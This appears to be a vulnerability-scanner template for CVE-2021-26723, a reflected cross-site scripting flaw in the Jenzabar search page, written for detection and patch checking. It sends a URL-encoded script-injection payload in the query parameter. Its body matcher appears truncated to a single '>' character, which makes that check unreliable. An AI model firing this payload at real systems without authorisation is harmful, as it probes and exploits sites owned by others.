id: CVE-2021-26723 info: name: Jenzabar 9.2x-9.2.2 - Cross-Site Scripting author: pikpikcu severity: medium description: Jenzabar 9.2.x through 9.2.2 contains a cross-site scripting vulnerability. It allows /ics?tool=search&query. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of Jenzabar 9.2x-9.2.2. reference: - http://packetstormsecurity.com/files/161303/Jenzabar-9.2.2-Cross-Site-Scripting.html - https://gist.github.com/Y0ung-DST/d1b6b65be6248b0ffc2b2f2120deb205 - https://jenzabar.com/blog - https://y0ungdst.medium.com/xss-in-jenzabar-cve-2021-26723-a0749231328 - https://nvd.nist.gov/vuln/detail/CVE-2021-26723 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-26723 cwe-id: CWE-79 epss-score: 0.07461 epss-percentile: 0.93346 cpe: cpe:2.3:a:jenzabar:jenzabar:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jenzabar product: jenzabar tags: packetstorm,cve,cve2021,jenzabar,xss http: - method: GET path: - "{{BaseURL}}/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" matchers-condition: and matchers: - type: word part: body words: - ">" - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 490a004630440220424bbd918609f1243e9b0c31531c19abd719520dc5adf7e27833ad35e80e925002202d93afa0e75b61c39bea784ab3b83d1ac89ea2a71c8099f41385a99fcea3a86c:922c64590222798bb761d5b6d8e72950